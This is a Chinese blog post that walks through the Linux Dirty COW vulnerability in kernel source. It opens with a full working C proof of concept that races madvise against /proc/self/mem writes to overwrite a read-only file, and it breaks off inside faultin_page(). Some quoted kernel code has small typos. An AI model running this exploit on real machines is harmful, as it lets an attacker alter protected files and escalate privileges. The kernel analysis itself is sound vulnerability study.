从源码看dirtyCOW(脏牛漏洞)

从源码看dirtyCOW(脏牛漏洞)

先把脏牛的poc代码贴出来

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
#include <stdio.h>
#include <sys/mman.h>
#include <fcntl.h>
#include <pthread.h>
#include <unistd.h>
#include <sys/stat.h>
#include <string.h>
#include <stdint.h>

struct stat st;
int f;
int bSuccess;
void *map;
char *name;

void *procselfmemThread(void *arg);
void *madviseThread(void *arg);

int main(int argc, char const *argv[])
{
	if(argc < 3)
	{
		(void)fprintf(stderr, "%s\n", "usage: dirtycow target_file new_content");
		return 1;
	}
	pthread_t pth1,pth2;

	f = open(argv[1], O_RDONLY);
	fstat(f, &st);
	name = argv[1];

	map = mmap(NULL, st.st_size, PROT_READ, MAP_PRIVATE, f, 0);
	printf("mmap %zx\n", (uintptr_t)map);

	pthread_create(&pth1, NULL, madviseThread, argv[1]);
	pthread_create(&pth2, NULL, procselfmemThread, argv[2]);

	pthread_join(pth1,NULL);
	pthread_join(pth2,NULL);

	close(f);

	return 0;
}

void *procselfmemThread(void *arg)
{
	char *str;
	str = (char *)arg;

	int f = open("/proc/self/mem", O_RDWR);
	int i = 0, c = 0;
	while(i < 1000000 && !bSuccess)
	{
		lseek(f, (uintptr_t)map, SEEK_SET);
		c += write(f,str,strlen(str));
		i++;
	}
	close(f);
	printf("procselfmem %d \n\n", c);
}

void *madviseThread(void *arg)
{
	char *str;
	str = (char *)arg;
	int f = open(str, O_RDONLY);
	int i = 0, c = 0;
	char buffer1[1024], buffer2[1024];
	int size;
	lseek(f, 0, SEEK_SET);
	size = read(f, buffer1, sizeof(buffer1));
	while(i < 10000000)
	{
		c += madvise(map, 5, MADV_DONTNEED);
		lseek(f, 0, SEEK_SET);
		size = read(f,buffer2,sizeof(buffer2));
		if(size > 0 && strcmp(buffer1,buffer2))
		{
			printf("Hack success!\n\n");
			bSuccess = 1;
			break;
		}
		i++;
	}
	close(f);
	printf("madvise %d\n\n",c);
}

然后分析write函数写入/proc/self/mem返回的fd源码执行过程

write()

SYSCALL_DEFINE3()

当调用write系统调用时会先调用SYSCALL_DEFINE3(在fs\read_write.c),也就是下面这个函数,sys_write()获取一些参数后调用vfs_write()进行真正的写入

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
// write系统调用入口
SYSCALL_DEFINE3(write, unsigned int, fd, const char __user *, buf,
		size_t, count)
{
	struct fd f = fdget_pos(fd); // 根据fd找到对应的文件对象和标志
	ssize_t ret = -EBADF;

	if (f.file) {
		loff_t pos = file_pos_read(f.file); // 读取文件对象的位置指针
		ret = vfs_write(f.file, buf, count, &pos); // 通过虚拟文件系统对文件的写操作
		if (ret >= 0)
			file_pos_write(f.file, pos);  // 设置文件对象的位置指针
		fdput_pos(f);  // 释放这个对象的引用
	}

	return ret;
}

vfs_write()

这是虚拟文件系统提供的通用的文件写入操作, 本身就是一个__vfs_write()的包裹函数

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
ssize_t vfs_write(struct file *file, const char __user *buf, size_t count, loff_t *pos)
{
	ssize_t ret;

	if (!(file->f_mode & FMODE_WRITE)) // 文件不可写入
		return -EBADF;
	if (!(file->f_mode & FMODE_CAN_WRITE))  // 文件不能写入
		return -EINVAL;
	if (unlikely(!access_ok(VERIFY_READ, buf, count))) // 空的
		return -EFAULT;

	ret = rw_verify_area(WRITE, file, pos, count); // 验证下文件的这片区域是否可写入
	if (!ret) {
		if (count > MAX_RW_COUNT) // 每次write最大写入一页,sys_write()不保证完全写入
			count =  MAX_RW_COUNT;
		file_start_write(file);  // 进行写入前的准备工作,主要是获取super block的写入权限(super block描述整个分区的文件系统信息,例如块大小、文件系统版本号、上次mount的时间等等。)
		ret = __vfs_write(file, buf, count, pos); // 进行真正的写入
		if (ret > 0) {
			fsnotify_modify(file); // 通知一下这个文件已经被写入过了
			add_wchar(current, ret);
		}
		inc_syscw(current);
		file_end_write(file);
	}

	return ret; // 写入的字节数
}

__vfs_write()

这个函数主要就是根据文件对象调用其内部的write()方法

1
2
3
4
5
6
7
8
9
10
11
ssize_t __vfs_write(struct file *file, const char __user *p, size_t count,
		    loff_t *pos)
{
	if (file->f_op->write) // 调用文件对象中的write操作
		return file->f_op->write(file, p, count, pos);
	else if (file->f_op->write_iter) // 如果没有自定义write方法的话,尝试调用write_iter方法,这个方法对应writev(),一次系统调用会写入多个缓冲区,对于/proc/self/mem这个文件对象来说, 会调用mem_write()函数
		return new_sync_write(file, p, count, pos);
	else
		return -EINVAL;
}
EXPORT_SYMBOL(__vfs_write);

image-20211123111919954

mem_write()

mem_write()(在fs\proc\base.c)会调用mem_rw()

1
2
3
4
5
static ssize_t mem_write(struct file *file, const char __user *buf,
			 size_t count, loff_t *ppos)
{
	return mem_rw(file, (char __user*)buf, count, ppos, 1);
}

mem_rw()

mem_rw()首先根据/proc/self/mem这个文件对象的私有数据区域, 找到其映射的是哪一个虚拟地址空间, 然后在内核中申请了一个临时页作为内核缓冲区

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
static ssize_t mem_rw(struct file *file, //要读/写的文件 /proc/self/mem
                      char __user *buf,  //用户空间的缓冲区
					size_t count,      //读/写的长度
                      loff_t *ppos, 	 //从哪里开始
                      int write)         //读/写
{
	struct mm_struct *mm = file->private_data; //mem文件的private_data指向file对应的虚拟地址空间
	unsigned long addr = *ppos;  //mm中要读写的地址偏移
	ssize_t copied;
	char *page;
	unsigned int flags;

	if (!mm)
		return 0;

	page = (char *)__get_free_page(GFP_TEMPORARY); //获取一个临时页,刚进入sys_write()时就限制了一次最多写入一页
	if (!page)
		return -ENOMEM;

	copied = 0;
	if (!atomic_inc_not_zero(&mm->mm_users)) //增加一个引用次数
		goto free;
   
	while (count > 0) { //count表示剩余要写的长度
		int this_len = min_t(int, count, PAGE_SIZE); //本次写入多少
		//如果要写入的话,先把用户要写入的数据复制到内核的临时缓冲区中
		if (write && copy_from_user(page, buf, this_len)) {//copy_from_user成功返回0
			copied = -EFAULT;
			break;
		}
		//读写别人的虚拟地址空间,进程A可能会读写/proc/B/mem, 因此需要调用access_remote_vm()去读写别的进程的虚拟地址空间, 而不再是本进程的地址空间了
		this_len = access_remote_vm(mm, addr, page, this_len, write);
		if (!this_len) {
			if (!copied)
				copied = -EIO;
			break;
		}
		//如果要读入的话,把内核读到的数据复制到用户缓冲区中
		if (!write && copy_to_user(buf, page, this_len)) {
			copied = -EFAULT;
			break;
		}

		buf += this_len; //用户缓冲区
		addr += this_len; //读写地址
		copied += this_len; //读写了多少字节
		count -= this_len; //还剩多少字节
	}
	*ppos = addr;

	mmput(mm);
free:
	free_page((unsigned long) page);
	return copied;
}

access_remote_vm()

是__access_remote_vm()的包裹函数

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
/**
 * access_remote_vm - access another process' address space
 * @mm:		the mm_struct of the target address space
 * @addr:	start address to access
 * @buf:	source or destination buffer
 * @len:	number of bytes to transfer
 * @gup_flags:	flags modifying lookup behaviour
 *
 * The caller must hold a reference on @mm.
 */
int access_remote_vm(struct mm_struct *mm, unsigned long addr,
		void *buf, int len, int write)
{
	return __access_remote_vm(NULL, mm, addr, buf, len, write);
}

__access_remote_vm()

主要分为两部分, 首先调用get_user_pages_remote()把页面锁定在内存中, 从而可以直接访问

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
//访问mm指向的其他进程的地址空间,如果tsk非NULL,则用来进行缺页异常计数
int __access_remote_vm(struct task_struct *tsk, struct mm_struct *mm,
		unsigned long addr, void *buf, int len, int write)
{
	struct vm_area_struct *vma;
	void *old_buf = buf;

	down_read(&mm->mmap_sem);//获取mmap_sem信号量
	/* ignore errors, just check how much was successfully transferred */
	while (len) { //循环,直到写入len长度
		int bytes, ret, offset;
		void *maddr;
		struct page *page = NULL;
		//把要访问的其他进程的页面锁定在内存中,避免缺页异常,这里只获取一页,page就指向锁定的那一页
		ret = get_user_pages_remote(tsk, mm, addr, 1, write, 1, &page, &vma);
		if (ret <= 0) {
#ifndef CONFIG_HAVE_IOREMAP_PROT
			break;
#else
			/*
			 * Check if this is a VM_IO | VM_PFNMAP VMA, which
			 * we can access using slightly different code.
			 */
			vma = find_vma(mm, addr);
			if (!vma || vma->vm_start > addr)
				break;
			if (vma->vm_ops && vma->vm_ops->access)
				ret = vma->vm_ops->access(vma, addr, buf,
							  len, write);
			if (ret <= 0)
				break;
			bytes = ret;
#endif
         /*然后根据锁定的页对象page找到其所处的内存地址maddr, 然后使用copy_to_user_page()进行写入工作*/   
		} else {
			bytes = len; //要写入的长度
			offset = addr & (PAGE_SIZE-1); //addr的页内偏移
            /*
            	bytes+offset <= PAGE_SIZE
            	=> 写入长度+页内偏移 <= PAGE_SIZE
            	=> 锁定是页为单位的,因此不能跨页写入
            */
			if (bytes > PAGE_SIZE-offset)
				bytes = PAGE_SIZE-offset;
			//此时的page为get_user_pages_remote()为用户寻找的,被锁定在内存中,kamp将其映射到内核地址空间中
			maddr = kmap(page);
			if (write) {  //写入请求
                /*
                	先调用copy_to_user_page()进行写入
                		maddr为根据addr锁定的页,offset为addr的页内偏移,两者相加就是要写入的地址
                	等价为:memcpy(maddr + offset, buf, bytes);
                */
				copy_to_user_page(vma, page, addr,
						  maddr + offset, buf, bytes);
				set_page_dirty_lock(page); //标记为脏页
			} else {
				copy_from_user_page(vma, page, addr,
						    buf, maddr + offset, bytes);//从锁定的页面中复制到缓冲区中
			}
			kunmap(page);//取消映射
			put_page(page);//释放页
		}
		len -= bytes;
		buf += bytes;
		addr += bytes;
	}
	up_read(&mm->mmap_sem);

	return buf - old_buf;
}

上面函数的核心就在与怎么把别的进程的页面锁定在内存中的,所以看看get_user_pages_remote的实现

get_user_pages_remote()

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
/*
 * get_user_pages_remote() - 把用户页面锁定在内存中
 * @tsk:	the task_struct to use for page fault accounting, or NULL if faults are not to be recorded. 
 * 用于进行缺页异常计数的任务描述符,如果是NULL的话就不进行计数
 * @mm:		mm_struct of target mm 目标虚拟内存空间
 * @start:	starting user address   起始用户地址
 * @nr_pages:	number of pages from start to pin  从start开始要锁定多少页面
 * @write:	这些要锁定的页表是否需要被写入   
 * @force:  当用户映射正在保护时,是否强制访问
 * @pages:	array that receives pointers to the pages pinned. 一个page指针数组,用于存放指向被锁定的pages的指针
 *		Should be at least nr_pages long. Or NULL, if caller
 *		only intends to ensure the pages are faulted in.
 * @vmas:	array of pointers to vmas corresponding to each page. 一个VMA指针数组,用于存放每一个页面对应的VMA对象
 *		Or NULL if the caller does not require them.
   返回被锁定的页面数量,有可能比请求的少,如果是0或者负数,就表示出错了
   pages中返回的每一个页面都必须通过put_page()进行释放
   vmas中的指针会一直有效,直到mmap_sem被释放
  调用它的 ret = get_user_pages_remote(tsk, mm, addr, 1, write, 1, &page, &vma);
 */
long get_user_pages_remote(struct task_struct *tsk, struct mm_struct *mm,
		unsigned long start, unsigned long nr_pages,
		int write,int force, struct page **pages,
		struct vm_area_struct **vmas)
{
	return __get_user_pages_locked(tsk, mm, start, nr_pages, write, force, pages, vmas,
				       NULL, false,
				       FOLL_TOUCH | FOLL_REMOTE);
}
EXPORT_SYMBOL(get_user_pages_remote);

__get_user_pages_locked()

由于locked设置为NULL, 因此get_user_pages_locked()设置flags, 调用get_user_pages()就直接返回了, 不会进入VM_FAULT_RETRY的逻辑

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
static __always_inline long __get_user_pages_locked(
    					struct task_struct *tsk,		
						struct mm_struct *mm,				
						unsigned long start,
						unsigned long nr_pages,
    					int write;
    					int force;
						struct page **pages,
						struct vm_area_struct **vmas,
						int *locked,  //是否使用VM_FAULT_RETRY功能,设为NULL
						bool notify_drop, //不进行通知,设为false
						unsigned int flags) //标志 FOLL_TOUCH | FOLL_REMOTE
{
	long ret, pages_done;
	bool lock_dropped;

	if (locked) {
		/* if VM_FAULT_RETRY can be returned, vmas become invalid */
		BUG_ON(vmas);
		/* check caller initialized locked */
		BUG_ON(*locked != 1);
	}
	//根据请求设置flag,控制行为
	if (pages) //如果要获取页面,设置FOLL_GET标志
		flags |= FOLL_GET;
	if (write) //如果要写入,设置FOLL_WRITE标志
		flags |= FOLL_write;
    if (force) 
		flags |= FOLL_FORCE;
    
	pages_done = 0;
	lock_dropped = false;
	for (;;) {
		ret = __get_user_pages(tsk, mm, start, nr_pages, flags, pages,
				       vmas, locked);
		if (!locked) //如果VM_FAULT_RETRY无法触发,就直接返回
			/* VM_FAULT_RETRY couldn't trigger, bypass */
			return ret;

		/* VM_FAULT_RETRY cannot return errors */
		if (!*locked) {
			BUG_ON(ret < 0);
			BUG_ON(ret >= nr_pages);
		}

		if (!pages)
			/* If it's a prefault don't insist harder */
			return ret;

		if (ret > 0) {
			nr_pages -= ret;
			pages_done += ret;
			if (!nr_pages)
				break;
		}
		if (*locked) {
			/* VM_FAULT_RETRY didn't trigger */
			if (!pages_done)
				pages_done = ret;
			break;
		}
		/* VM_FAULT_RETRY triggered, so seek to the faulting offset */
		pages += ret;
		start += ret << PAGE_SHIFT;

		/*
		 * Repeat on the address that fired VM_FAULT_RETRY
		 * without FAULT_FLAG_ALLOW_RETRY but with
		 * FAULT_FLAG_TRIED.
		 */
		*locked = 1;
		lock_dropped = true;
		down_read(&mm->mmap_sem);
		ret = __get_user_pages(tsk, mm, start, 1, flags | FOLL_TRIED,
				       pages, NULL, NULL);
		if (ret != 1) {
			BUG_ON(ret > 1);
			if (!pages_done)
				pages_done = ret;
			break;
		}
		nr_pages--;
		pages_done++;
		if (!nr_pages)
			break;
		pages++;
		start += PAGE_SIZE;
	}
	if (notify_drop && lock_dropped && *locked) {
		/*
		 * We must let the caller know we temporarily dropped the lock
		 * and so the critical section protected by it was lost.
		 */
		up_read(&mm->mmap_sem);
		*locked = 0;
	}
	return pages_done;
}

__get_user_page()

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
/**
 * __get_user_pages() - pin user pages in memory 把用户页面锁定在内存中
 * @tsk:	task_struct of target task			目标进程
 * @mm:		mm_struct of target mm				目标内存空间
 * @start:	starting user address				用户起始地址
 * @nr_pages:	number of pages from start to pin	锁定多少页
 * @gup_flags:	flags modifying pin behaviour		控制get_user_pages行为的标志
 * @pages:	array that receives pointers to the pages pinned. 
 *		Should be at least nr_pages long. Or NULL, if caller
 *		only intends to ensure the pages are faulted in.
 * @vmas:	array of pointers to vmas corresponding to each page.
 *		Or NULL if the caller does not require them.
 * @nonblocking: whether waiting for disk IO or mmap_sem contention 是否等待磁盘IO或者mmap_sem的竞争
 */
static long __get_user_pages(struct task_struct *tsk, struct mm_struct *mm,
		unsigned long start, unsigned long nr_pages,
		unsigned int gup_flags, struct page **pages,
		struct vm_area_struct **vmas, int *nonblocking)
{
	long i = 0;
	unsigned int page_mask; //根据页面大小设置的掩码
	struct vm_area_struct *vma = NULL;

	if (!nr_pages)
		return 0;

  
	VM_BUG_ON(!!pages != !!(gup_flags & FOLL_GET));

	/*
	 * If FOLL_FORCE is set then do not force a full fault as the hinting
	 * fault information is unrelated to the reference behaviour of a task
	 * using the address space
	 */
	if (!(gup_flags & FOLL_FORCE))
		gup_flags |= FOLL_NUMA;
	//然后通过一个do{…}while(nr_pages)循环, 遍历所有需要锁定的页, 处理一个页之前, 先找到所属的VMA
	do {
		struct page *page;
		unsigned int foll_flags = gup_flags;
		unsigned int page_increm;

		/* first iteration or cross vma bound */
        /* 如果是第一次迭代,或者跨越了VMA的边界 */
		if (!vma || start >= vma->vm_end) {
			vma = find_extend_vma(mm, start); //寻找包含start的VMA对象
			if (!vma && in_gate_area(mm, start)) { //寻找出错
				int ret;
				ret = get_gate_page(mm, start & PAGE_MASK,
						gup_flags, &vma,
						pages ? &pages[i] : NULL);
				if (ret)
					return i ? : ret;
				page_mask = 0;
				goto next_page;
			}
			//短路测试:如果VMA不为NULL,那么就会执行check_vma_flags检查的权限是否满足gup_flags的要求
			if (!vma || check_vma_flags(vma, gup_flags))
				return i ? : -EFAULT;
			if (is_vm_hugetlb_page(vma)) { //对于大TLB的页面,调用follow_hugetlb_page处理
				i = follow_hugetlb_page(mm, vma, pages, vmas,
						&start, &nr_pages, i,
						gup_flags);
				continue;
			}
		}
 //__get_user_pages()最核心的部分, 就是下面这个循环, follow_page_mask()判断对应页是否满足foll_flags要求, faultin_page()负责处理错误, 会一直循环到对应页满足foll_flags的要求
retry:
		/*
		 * If we have a pending SIGKILL, don't keep faulting pages and
		 * potentially allocating memory. 
		 如果有待处理的SIGKILL,就直接结束
		 */
		if (unlikely(fatal_signal_pending(current)))
			return i ? i : -ERESTARTSYS;
        
		cond_resched(); //调度执行别的任务,给了竞态条件空窗期
        
        //根据foll_flags的要求追踪vma中的start对应的页,如果不能满足要求或者页不存在,就返回NULL
		page = follow_page_mask(vma, start, foll_flags, &page_mask);
		if (!page) { //缺页异常处理
			int ret;
            //faultin_page会处理缺页异常,处理完毕后会返回0
			ret = faultin_page(tsk, vma, start, &foll_flags,
					nonblocking);
			switch (ret) {
			case 0:
				goto retry; //缺页异常处理完毕,再次尝试追踪页,看有无缺页异常发生
			case -EFAULT: //处理缺页异常时发生错误,处理终止
			case -ENOMEM:
			case -EHWPOISON:
				return i ? i : ret;
			case -EBUSY:
				return i;
			case -ENOENT: //异常处理完毕,只是没有对应的页描述符,处理下一个页
				goto next_page;
			}
			BUG();
		} else if (PTR_ERR(page) == -EEXIST) {
			/*
			 * Proper page table entry exists, but no corresponding
			 * struct page.
			 */
			goto next_page;
		} else if (IS_ERR(page)) {
			return i ? i : PTR_ERR(page);
		}
		if (pages) { //记录锁定的页
			pages[i] = page;
			flush_anon_page(vma, page, start);
			flush_dcache_page(page);
			page_mask = 0;
		}
//处理完这个页之后, 记录结果, 然后处理下一个页
next_page:
		if (vmas) { //记录页对应的vma
			vmas[i] = vma;
			page_mask = 0;
		}
		page_increm = 1 + (~(start >> PAGE_SHIFT) & page_mask);  //处理了多少页
		if (page_increm > nr_pages)			//处理的不能比请求的还多
			page_increm = nr_pages;
		i += page_increm;     					//处理了多少页
		start += page_increm * PAGE_SIZE;		//下一个处理的地址
		nr_pages -= page_increm;				//还剩多少页
	} while (nr_pages);
	return i;
}

follow_page_mask()

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
/**
 * follow_page_mask - look up a page descriptor from a user-virtual address  根据一个用户空间的虚拟地址找一个页描述符
 * @vma: vm_area_struct mapping @address	映射@address的VMA对象
 * @address: virtual address to look up		
 * @flags: flags modifying lookup behaviour		控制查找行为的描述符
 * @page_mask: on output, *page_mask is set according to the size of the page 
 *
 * @flags can have FOLL_ flags set, defined in <linux/mm.h> flags是一个FOLL_标志的集合,定义在<linux/mm.h>
 *	返回被映射的页,如果页不存在或出错的话就返回NULL
 * Returns the mapped (struct page *), %NULL if no mapping exists, or
 * an error pointer if there is a mapping to something not represented
 * by a page descriptor (see also vm_normal_page()).
 */
struct page *follow_page_mask(struct vm_area_struct *vma,
			      unsigned long address, unsigned int flags,
			      unsigned int *page_mask)
{
	pgd_t *pgd;	//全局页目录
	pud_t *pud;	//页上级目录
	pmd_t *pmd;	//页中级目录
	spinlock_t *ptl;	 //自旋锁
	struct page *page;
	struct mm_struct *mm = vma->vm_mm; //VMA所属的内存空间

	*page_mask = 0; //根据页面大小设置的掩码
	
	page = follow_huge_addr(mm, address, flags & FOLL_WRITE);
	if (!IS_ERR(page)) {
		BUG_ON(flags & FOLL_GET);
		return page;
	}
    
/*-----然后就是跟踪四级页目录:pgd=>pud=>pmd, 如果对应表项为none, 则返回no_page_table()表示出错, 最后进入follow_page_pte()跟踪pte-----*/
    
    //在mm中根据address找对应的全局页目录
	pgd = pgd_offset(mm, address);
	if (pgd_none(*pgd) || unlikely(pgd_bad(*pgd))) //如果pgd表项为none,则调用no_page_table()
		return no_page_table(vma, flags);		//no_page_table()会尝试调用vm_ops->fault()通知一下缺页异常,然后返回NULL
	//然后在全局页目录中找对应的页上级目录
	pud = pud_offset(pgd, address); 
	if (pud_none(*pud)) //如果pud对应表项为none,跟上面一样
		return no_page_table(vma, flags);
	if (pud_huge(*pud) && vma->vm_flags & VM_HUGETLB) {//大页表相关的东西 不管
		page = follow_huge_pud(mm, address, pud, flags);
		if (page)
			return page;
		return no_page_table(vma, flags);
	}
	if (unlikely(pud_bad(*pud)))  //如果pud对应的表项有问题,则搜索失败
		return no_page_table(vma, flags);
	//在页上级目录中寻找页中级目录
	pmd = pmd_offset(pud, address);
	if (pmd_none(*pmd))
		return no_page_table(vma, flags);
	if (pmd_huge(*pmd) && vma->vm_flags & VM_HUGETLB) {
		page = follow_huge_pmd(mm, address, pmd, flags);
		if (page)
			return page;
		return no_page_table(vma, flags);
	}
	if ((flags & FOLL_NUMA) && pmd_protnone(*pmd))
		return no_page_table(vma, flags);
	if (pmd_devmap(*pmd)) { //不管
		ptl = pmd_lock(mm, pmd);
		page = follow_devmap_pmd(vma, address, pmd, flags);
		spin_unlock(ptl);
		if (page)
			return page;
	}
	if (likely(!pmd_trans_huge(*pmd))) //只要不是大页表,都会进入这里跟踪pte
		return follow_page_pte(vma, address, pmd, flags);

	ptl = pmd_lock(mm, pmd);
	if (unlikely(!pmd_trans_huge(*pmd))) {
		spin_unlock(ptl);
		return follow_page_pte(vma, address, pmd, flags);
	}
	if (flags & FOLL_SPLIT) {
		int ret;
		page = pmd_page(*pmd);
		if (is_huge_zero_page(page)) {
			spin_unlock(ptl);
			ret = 0;
			split_huge_pmd(vma, pmd, address);
			if (pmd_trans_unstable(pmd))
				ret = -EBUSY;
		} else {
			if (unlikely(!try_get_page(page))) {
				spin_unlock(ptl);
				return ERR_PTR(-ENOMEM);
			}
			spin_unlock(ptl);
			lock_page(page);
			ret = split_huge_page(page);
			unlock_page(page);
			put_page(page);
			if (pmd_none(*pmd))
				return no_page_table(vma, flags);
		}

		return ret ? ERR_PTR(ret) :
			follow_page_pte(vma, address, pmd, flags);
	}

	page = follow_trans_huge_pmd(vma, address, pmd, flags);
	spin_unlock(ptl);
	*page_mask = HPAGE_PMD_NR - 1;
	return page;
}

follow_page_pte()

对于大多数普通页来说follow_page_pte()会检查页不存在和页不可写入两种缺页异常,然后调用vm_normal_page()根据pte找到对应的页描述符page

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
static struct page *follow_page_pte(struct vm_area_struct *vma,
		unsigned long address, pmd_t *pmd, unsigned int flags)
{
	struct mm_struct *mm = vma->vm_mm;
	struct dev_pagemap *pgmap = NULL;
	struct page *page;
	spinlock_t *ptl;
	pte_t *ptep, pte;

retry:
	if (unlikely(pmd_bad(*pmd))) //如果pmd表项出问题,搜索失败
		return no_page_table(vma, flags);

	ptep = pte_offset_map_lock(mm, pmd, address, &ptl); //给对应PTE表项上锁
	pte = *ptep;									//获取PTE
	if (!pte_present(pte)) {					//如果PTE表示页不存在
		swp_entry_t entry;
		/*
		 * KSM's break_ksm() relies upon recognizing a ksm page
		 * even while it is being migrated, so for that case we
		 * need migration_entry_wait().
		 */
		if (likely(!(flags & FOLL_MIGRATION)))  //除非设置了FOLL_MIGRATION标志,不然直接进入no_page部分
			goto no_page;
		if (pte_none(pte))				//如果PTE为none,则进入no_page部分
			goto no_page;
		entry = pte_to_swp_entry(pte);
		if (!is_migration_entry(entry))
			goto no_page;
		pte_unmap_unlock(ptep, ptl);
		migration_entry_wait(mm, pmd, address);
		goto retry;
	}
	if ((flags & FOLL_NUMA) && pte_protnone(pte))
		goto no_page;
	if ((flags & FOLL_WRITE) && !can_follow_write_pte(pte, flags)) { //如果要求写入,但是pte表示不可写入,搜索失败
		pte_unmap_unlock(ptep, ptl);
		return NULL;
	}
/*
找到页描述符后, 会根据flags进行一些操作, 然后返回page, 在这里flags = 0x2017, 也就是如下标志
FOLL_WRITE 0x01 : 需要进行写入
FOLL_TOUCH 0x02 : 标记一下页面被访问过
FOLL_GET 0x04 : 获取页面的引用, 从而让页面锁定在内存中
FOLL_FORCE 0x10 : 强制写入只读内存区
FOLL_REMOTE 0x2000 : 要访问的不是当前任务的内存空间
*/
	page = vm_normal_page(vma, address, pte); //根据这个pte找到对应的普通页描述符
	if (!page && pte_devmap(pte) && (flags & FOLL_GET)) {
		/*
		 * Only return device mapping pages in the FOLL_GET case since
		 * they are only valid while holding the pgmap reference.
		 */
		pgmap = get_dev_pagemap(pte_pfn(pte), NULL);
		if (pgmap)
			page = pte_page(pte);
		else
			goto no_page;
	} else if (unlikely(!page)) {
		if (flags & FOLL_DUMP) {
			/* Avoid special (like zero) pages in core dumps */
			page = ERR_PTR(-EFAULT);
			goto out;
		}

		if (is_zero_pfn(pte_pfn(pte))) {
			page = pte_page(pte);
		} else {
			int ret;

			ret = follow_pfn_pte(vma, address, ptep, flags);
			page = ERR_PTR(ret);
			goto out;
		}
	}

	if (flags & FOLL_SPLIT && PageTransCompound(page)) {
		int ret;
		get_page(page);
		pte_unmap_unlock(ptep, ptl);
		lock_page(page);
		ret = split_huge_page(page);
		unlock_page(page);
		put_page(page);
		if (ret)
			return ERR_PTR(ret);
		goto retry;
	}

	if (flags & FOLL_GET) {//如果设置了GET标志,则会获取一个页面的引用,防止页面被从内存中换出
		if (unlikely(!try_get_page(page))) {
			page = ERR_PTR(-ENOMEM);
			goto out;
		}

		/* drop the pgmap reference now that we hold the page */
		if (pgmap) {
			put_dev_pagemap(pgmap);
			pgmap = NULL;
		}
	}
	if (flags & FOLL_TOUCH) { //标记下这个页被访问过
        //如果要写入,但是页面现在不是脏的话,就设置为脏页
		if ((flags & FOLL_WRITE) &&
		    !pte_dirty(pte) && !PageDirty(page))
			set_page_dirty(page);
		/*
		 * pte_mkyoung() would be more correct here, but atomic care
		 * is needed to avoid losing the dirty bit: it is easier to use
		 * mark_page_accessed().
		 */
        //标记下这个页面被访问过
		mark_page_accessed(page);
	}
	if ((flags & FOLL_MLOCK) && (vma->vm_flags & VM_LOCKED)) {
		/* Do not mlock pte-mapped THP */
		if (PageTransCompound(page))
			goto out;

		/*
		 * The preliminary mapping check is mainly to avoid the
		 * pointless overhead of lock_page on the ZERO_PAGE
		 * which might bounce very badly if there is contention.
		 *
		 * If the page is already locked, we don't need to
		 * handle it now - vmscan will handle it later if and
		 * when it attempts to reclaim the page.
		 */
		if (page->mapping && trylock_page(page)) {
			lru_add_drain();  /* push cached pages to LRU */
			/*
			 * Because we lock page here, and migration is
			 * blocked by the pte's page reference, and we
			 * know the page is still mapped, we don't even
			 * need to check for file-cache page truncation.
			 */
			mlock_vma_page(page);
			unlock_page(page);
		}
	}
out:
	pte_unmap_unlock(ptep, ptl);
	return page;
no_page:
	pte_unmap_unlock(ptep, ptl);
	if (!pte_none(pte))
		return NULL;
	return no_page_table(vma, flags);
}

faultin_page()

fault_page()会把flags中的FOLL标志转为handle_mm_fault()使用的FAULT标志,然后调用handle_mm_fault()处理

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
static int faultin_page(struct task_struct *tsk, struct vm_area_struct *vma,
		unsigned long address, unsigned int *flags, int *nonblocking)
{
	unsigned int fault_flags = 0;
	int ret;

